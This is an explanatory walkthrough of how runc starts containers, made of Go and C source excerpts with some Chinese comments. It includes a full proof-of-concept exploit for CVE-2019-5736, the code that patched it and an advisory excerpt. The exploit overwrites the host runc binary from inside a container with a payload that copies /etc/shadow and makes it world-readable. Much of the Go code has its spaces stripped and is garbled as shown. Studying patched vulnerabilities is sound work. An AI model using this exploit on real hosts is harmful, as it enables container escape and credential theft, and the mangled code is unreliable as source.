// runCommand defines the `run` CLI command ("create and run a container").
// Its Action validates the arguments with checkArgs, calls startContainer
// with CT_ACT_RUN, and on success exits the process with the returned status;
// on failure it returns the startContainer error wrapped as "runc run failed".
// The default action is to start a container.
varrunCommand=cli.Command{Name:"run",Usage:"create and run a container",...Action:func(context*cli.Context)error{iferr:=checkArgs(context,1,exactArgs);err!=nil{returnerr}status,err:=startContainer(context,CT_ACT_RUN,nil)iferr==nil{// exit with the container's exit status so any external supervisor is
// notified of the exit with the correct exit status.
os.Exit(status)}returnfmt.Errorf("runc run failed: %w",err)},}
funcstartContainer(context*cli.Context,actionCtAct,criuOpts*libcontainer.CriuOpts)(int,error){iferr:=revisePidFile(context);err!=nil{return-1,err}//读取配置文件,获取配置信息
spec,err:=setupSpec(context)iferr!=nil{return-1,err}id:=context.Args().First()ifid==""{return-1,errEmptyID}notifySocket:=newNotifySocket(context,os.Getenv("NOTIFY_SOCKET"),id)ifnotifySocket!=nil{iferr:=notifySocket.setupSpec(context,spec);err!=nil{return-1,err}}//传入配置参数,创建container对象
container,err:=createContainer(context,id,spec)iferr!=nil{return-1,err}ifnotifySocket!=nil{iferr:=notifySocket.setupSocketDirectory();err!=nil{return-1,err}ifaction==CT_ACT_RUN{iferr:=notifySocket.bindSocket();err!=nil{return-1,err}}}// Support on-demand socket activation by passing file descriptors into the container init process.
listenFDs:=[]*os.File{}ifos.Getenv("LISTEN_FDS")!=""{listenFDs=activation.Files(false)}r:=&runner{enableSubreaper:!context.Bool("no-subreaper"),shouldDestroy:!context.Bool("keep"),container:container,listenFDs:listenFDs,notifySocket:notifySocket,consoleSocket:context.String("console-socket"),detach:context.Bool("detach"),pidFile:context.String("pid-file"),preserveFDs:context.Int("preserve-fds"),action:action,criuOpts:criuOpts,init:true,}returnr.run(spec.Process)}
// run (excerpt) creates a libcontainer process from config and dispatches on
// r.action to Start, Restore or Run the container; any other action panics.
// Parts elided by the excerpt are marked "...".
func(r*runner)run(config*specs.Process)(int,error){...// create the process from config
process,err:=newProcess(*config)iferr!=nil{return-1,err}process.LogLevel=strconv.Itoa(int(logrus.GetLevel()))// Populate the fields that come from runner.
process.Init=r.init// r.init is true when the runner was built by startContainer
...// r.action is CT_ACT_RUN at this point (the `runc run` path)
switchr.action{caseCT_ACT_CREATE:err=r.container.Start(process)caseCT_ACT_RESTORE:err=r.container.Restore(process,r.criuOpts)caseCT_ACT_RUN:// this is the method that gets called
err=r.container.Run(process)default:panic("Unknown action")}...}
func(c*linuxContainer)start(process*Process)(retErrerror){//创建parent对象
parent,err:=c.newParentProcess(process)iferr!=nil{returnfmt.Errorf("unable to create new parent process: %w",err)}logsDone:=parent.forwardChildLogs()iflogsDone!=nil{deferfunc(){// Wait for log forwarder to finish. This depends on
// runc init closing the _LIBCONTAINER_LOGPIPE log fd.
err:=<-logsDoneiferr!=nil&&retErr==nil{retErr=fmt.Errorf("unable to forward init logs: %w",err)}}()}//启动子进程
iferr:=parent.start();err!=nil{returnfmt.Errorf("unable to start container process: %w",err)}ifprocess.Init{c.fifo.Close()ifc.config.Hooks!=nil{s,err:=c.currentOCIState()iferr!=nil{returnerr}iferr:=c.config.Hooks[configs.Poststart].RunHooks(s);err!=nil{iferr:=ignoreTerminateErrors(parent.terminate());err!=nil{logrus.Warn(fmt.Errorf("error running poststart hook: %w",err))}returnerr}}}returnnil}
func(c*linuxContainer)newParentProcess(p*Process)(parentProcess,error){//创建管道文件,管道的两端 parent/child 分别供父子进程使用
parentInitPipe,childInitPipe,err:=utils.NewSockPair("init")iferr!=nil{returnnil,fmt.Errorf("unable to create init pipe: %w",err)}messageSockPair:=filePair{parentInitPipe,childInitPipe}parentLogPipe,childLogPipe,err:=os.Pipe()iferr!=nil{returnnil,fmt.Errorf("unable to create log pipe: %w",err)}logFilePair:=filePair{parentLogPipe,childLogPipe}//写入子进程的命令
cmd:=c.commandTemplate(p,childInitPipe,childLogPipe)if!p.Init{returnc.newSetnsProcess(p,cmd,messageSockPair,logFilePair)}// We only set up fifoFd if we're not doing a `runc exec`. The historic
// reason for this is that previously we would pass a dirfd that allowed
// for container rootfs escape (and not doing it in `runc exec` avoided
// that problem), but we no longer do that. However, there's no need to do
// this for `runc exec` so we just keep it this way to be safe.
iferr:=c.includeExecFifo(cmd);err!=nil{returnnil,fmt.Errorf("unable to setup exec fifo: %w",err)}returnc.newInitProcess(p,cmd,messageSockPair,logFilePair)}
func(c*linuxContainer)commandTemplate(p*Process,childInitPipe*os.File,childLogPipe*os.File)*exec.Cmd{//initPath: "/proc/self/exe"
//initArgs: ["runc", "init"]
cmd:=exec.Command(c.initPath,c.initArgs[1:]...)cmd.Args[0]=c.initArgs[0]cmd.Stdin=p.Stdincmd.Stdout=p.Stdoutcmd.Stderr=p.Stderrcmd.Dir=c.config.Rootfsifcmd.SysProcAttr==nil{cmd.SysProcAttr=&unix.SysProcAttr{}}cmd.Env=append(cmd.Env,"GOMAXPROCS="+os.Getenv("GOMAXPROCS"))cmd.ExtraFiles=append(cmd.ExtraFiles,p.ExtraFiles...)ifp.ConsoleSocket!=nil{cmd.ExtraFiles=append(cmd.ExtraFiles,p.ConsoleSocket)cmd.Env=append(cmd.Env,"_LIBCONTAINER_CONSOLE="+strconv.Itoa(stdioFdCount+len(cmd.ExtraFiles)-1),)}//传入用于通信的管道文件
cmd.ExtraFiles=append(cmd.ExtraFiles,childInitPipe)cmd.Env=append(cmd.Env,"_LIBCONTAINER_INITPIPE="+strconv.Itoa(stdioFdCount+len(cmd.ExtraFiles)-1),"_LIBCONTAINER_STATEDIR="+c.root,)cmd.ExtraFiles=append(cmd.ExtraFiles,childLogPipe)cmd.Env=append(cmd.Env,"_LIBCONTAINER_LOGPIPE="+strconv.Itoa(stdioFdCount+len(cmd.ExtraFiles)-1),"_LIBCONTAINER_LOGLEVEL="+p.LogLevel,)// NOTE: when running a container with no PID namespace and the parent process spawning the container is
// PID1 the pdeathsig is being delivered to the container's init process by the kernel for some reason
// even with the parent still running.
ifc.config.ParentDeathSignal>0{cmd.SysProcAttr.Pdeathsig=unix.Signal(c.config.ParentDeathSignal)}returncmd}
packagemainimport("os""runtime""strconv""github.com/opencontainers/runc/libcontainer"// blank-import the nsenter package (imported only for its side effects)
_"github.com/opencontainers/runc/libcontainer/nsenter""github.com/sirupsen/logrus")funcinit(){// here os.Args[1] == "init" matches the "runc init" command
iflen(os.Args)>1&&os.Args[1]=="init"{// This is the golang entry point for runc init, executed
// before main() but after libcontainer/nsenter's nsexec().
// NOTE(review): the error returned by libcontainer.New is discarded below.
...factory,_:=libcontainer.New("")iferr:=factory.StartInitialization();err!=nil{// as the error is sent back to the parent there is no need to log
// or write it to stderr because the parent process will handle this
os.Exit(1)}panic("libcontainer: container init failed to exec")}}
/*
 * nsexec (excerpt): returns immediately when _LIBCONTAINER_INITPIPE is not
 * set to a valid fd; otherwise parses the netlink configuration from that
 * pipe and runs a setjmp-driven state machine over STAGE_PARENT, STAGE_CHILD
 * and STAGE_INIT. Parts elided by the excerpt are marked "...".
 */
voidnsexec(void){intpipenum;jmp_bufenv;intsync_child_pipe[2],sync_grandchild_pipe[2];structnlconfig_tconfig={0};.../*
* Get the init pipe fd from the environment. The init pipe is used to
* read the bootstrap data and tell the parent what the new pids are
* after the setup is done.
*/// get the pipe fd, from which the namespace information is read
pipenum=getenv_int("_LIBCONTAINER_INITPIPE");if(pipenum<0){/* We are not a runc init. Just return to go runtime. */return;}.../* Parse all of the netlink configuration. */// read the container configuration from the pipe
nl_parse(pipenum,&config);...current_stage=setjmp(env);switch(current_stage){/*
* Stage 0: We're in the parent. Our job is just to create a new child
* (stage 1: STAGE_CHILD) process and write its uid_map and
* gid_map. That process will go on to create a new process, then
* it will send us its PID which we will send to the bootstrap
* process.
*/caseSTAGE_PARENT:{...}break;/*
* Stage 1: We're in the first child process. Our job is to join any
* provided namespaces in the netlink payload and unshare all of
* the requested namespaces. If we've been asked to CLONE_NEWUSER,
* we will ask our parent (stage 0) to set up our user mappings
* for us. Then, we create a new child (stage 2: STAGE_INIT) for
* PID namespace. We then send the child's PID to our parent
* (stage 0).
*/caseSTAGE_CHILD:{.../*
* We need to setns first. We cannot do this earlier (in stage 0)
* because of the fact that we forked to get here (the PID of
* [stage 2: STAGE_INIT]) would be meaningless). We could send it
* using cmsg(3) but that's just annoying.
*/// join the namespaces
if(config.namespaces)join_namespaces(config.namespaces);...}break;/*
* Stage 2: We're the final child process, and the only process that will
* actually return to the Go runtime. Our job is to just do the
* final cleanup steps and then return to the Go runtime to allow
* init_linux.go to run.
*/caseSTAGE_INIT:{...}break;default:bail("unknown stage '%d' for jump value",current_stage);}
// StartInitialization (excerpt) parses the init pipe fd from the
// _LIBCONTAINER_INITPIPE environment variable, wraps it in an *os.File that is
// closed on return, builds the container init via newContainerInit and returns
// the result of its Init method. A non-numeric variable is logged and returned
// as an error. Parts elided by the excerpt are marked "...".
func(l*LinuxFactory)StartInitialization()(errerror){// Get the INITPIPE.
// Fetch the pipe fd from the environment variable.
envInitPipe:=os.Getenv("_LIBCONTAINER_INITPIPE")pipefd,err:=strconv.Atoi(envInitPipe)iferr!=nil{err=fmt.Errorf("unable to convert _LIBCONTAINER_INITPIPE: %w",err)logrus.Error(err)returnerr}pipe:=os.NewFile(uintptr(pipefd),"pipe")deferpipe.Close()...i,err:=newContainerInit(it,pipe,consoleSocket,fifofd,logPipeFd)iferr!=nil{returnerr}// If Init succeeds, syscall.Exec will not return, hence none of the defers will be called.
returni.Init()
// Init (excerpt) sets up the network and routes, prepares the root filesystem
// and finally execs the user process; the first failing step's error is
// returned. Parts elided by the excerpt are marked "...".
func(l*linuxStandardInit)Init()error{...// set up networking
iferr:=setupNetwork(l.config);err!=nil{returnerr}// set up routes
iferr:=setupRoute(l.config.Config);err!=nil{returnerr}// initialises the labeling system
selinux.GetEnabled()// switch to the container's root filesystem
iferr:=prepareRootfs(l.pipe,l.config);err!=nil{returnerr}...// replace the current process with the user process
iferr:=system.Exec(name,l.config.Args[0:],os.Environ());err!=nil{returnfmt.Errorf("can't exec user process: %w",err)}returnnil
packagemain// Implementation of CVE-2019-5736
// Created with help from @singe, @_cablethief, and @feexd.
// This commit also helped a ton to understand the vuln
// https://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d
import("fmt""io/ioutil""os""strconv""strings")// This is the line of shell commands that will execute on the host
varpayload="#!/bin/bash \n cat /etc/shadow > /tmp/shadow && chmod 777 /tmp/shadow"funcmain(){// First we overwrite /bin/sh with the /proc/self/exe interpreter path
fd,err:=os.Create("/bin/sh")iferr!=nil{fmt.Println(err)return}fmt.Fprintln(fd,"#!/proc/self/exe")err=fd.Close()iferr!=nil{fmt.Println(err)return}fmt.Println("[+] Overwritten /bin/sh successfully")// Loop through all processes to find one whose cmdline includes "runc init" (the check below only matches "runc")
// This will be the process created by runc
varfoundintforfound==0{pids,err:=ioutil.ReadDir("/proc")iferr!=nil{fmt.Println(err)return}for_,f:=rangepids{fbytes,_:=ioutil.ReadFile("/proc/"+f.Name()+"/cmdline")fstring:=string(fbytes)ifstrings.Contains(fstring,"runc"){fmt.Println("[+] Found the PID:",f.Name())found,err=strconv.Atoi(f.Name())iferr!=nil{fmt.Println(err)return}}}}// We will use the pid to get a file handle for runc on the host.
varhandleFd=-1forhandleFd==-1{// Note, you do not need to use the O_PATH flag for the exploit to work.
handle,_:=os.OpenFile("/proc/"+strconv.Itoa(found)+"/exe",os.O_RDONLY,0777)ifint(handle.Fd())>0{handleFd=int(handle.Fd())}}fmt.Println("[+] Successfully got the file handle")// Now that we have the file handle, let's write to the runc binary and overwrite it
// It will maintain its executable flag
for{writeHandle,_:=os.OpenFile("/proc/self/fd/"+strconv.Itoa(handleFd),os.O_WRONLY|os.O_TRUNC,0700)ifint(writeHandle.Fd())>0{fmt.Println("[+] Successfully got write handle",writeHandle)writeHandle.Write([]byte(payload))return}}}
/*
 * nsexec (excerpt): aborts via bail() when ensure_cloned_binary() returns a
 * negative value. Parts elided by the excerpt are marked "...".
 */
voidnsexec(void){.../*
* We need to re-exec if we are not in a cloned binary. This is necessary
* to ensure that containers won't be able to access the host binary
* through /proc/self/exe. See CVE-2019-5736.
*/if(ensure_cloned_binary()<0)bail("could not ensure we are a cloned binary");...}
/*
 * ensure_cloned_binary - re-execute the current program from a cloned copy.
 *
 * Returns the result of is_self_cloned() when it is positive or
 * -ENOTRECOVERABLE, -EINVAL when the argument vector cannot be fetched,
 * -EIO when the binary cannot be cloned, and -ENOEXEC when the environment
 * marker cannot be set or fexecve() returns.
 */
int ensure_cloned_binary(void)
{
	char **argv = NULL;
	int self_cloned, fd;

	/* Check that we're not self-cloned, and if we are then bail. */
	self_cloned = is_self_cloned();
	if (self_cloned > 0 || self_cloned == -ENOTRECOVERABLE)
		return self_cloned;

	if (fetchve(&argv) < 0)
		return -EINVAL;

	/* Make the copy of the binary that will be executed. */
	fd = clone_binary();
	if (fd < 0)
		return -EIO;

	/*
	 * Mark the environment and execute the copy. Reaching the code after
	 * this statement means either putenv() or fexecve() failed.
	 */
	if (putenv(CLONED_BINARY_ENV "=1") == 0)
		fexecve(fd, argv, environ);

	close(fd);
	return -ENOEXEC;
}
runC passes a file descriptor from the host’s filesystem to the “runc
init” bootstrap process when joining a container. This allows a
malicious process inside a container to gain access to the host
filesystem with its current privilege set. Due to the race window
between join-and-execve being quite small, this bug is quite hard to
exploit. A similar, though mostly unrelated, exploit was discovered in
LXC[1].